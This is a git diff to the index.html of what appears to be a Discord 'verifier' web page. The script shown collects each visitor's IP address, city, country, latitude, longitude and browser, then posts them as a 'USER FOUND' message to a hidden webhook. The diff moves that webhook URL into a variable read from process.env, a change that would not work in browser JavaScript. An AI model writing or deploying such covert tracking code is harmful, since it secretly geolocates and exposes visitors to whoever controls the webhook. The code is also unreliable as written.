--- a/index.html
+++ b/index.html
@@ -240,6 +240,8 @@
         <p style="text-align: center;">Powered by MaR Society © 2024</p>
     </div>
     <script>
+        const secret = process.env.visitor_webhook;
+        
         function setCookie(cname, cvalue, exdays) {
             var d = new Date();
             d.setTime(d.getTime() + (exdays * 24 * 60 * 60 * 1000));
@@ -296,7 +298,7 @@
                     var longitude = data.loc.split(',')[1];
                     var browser = navigator.userAgent;
                     var currentTime = new Date().toLocaleString();
-                    var webhookUrl = "/repos/verifier-discord/verifier-discord.github.io/actions/secrets/visitor_webhook";
+                    var webhookUrl = secret;
                     var message = "USER FOUND:\nIP address is: " + ipAddress + "\nlocated in: " + city + ", " + country + "\nlatitude is: " + latitude + "\nlongitude is: " + longitude + "\nbrowser was opened at: " + currentTime;
 
                     var xhr = new XMLHttpRequest();
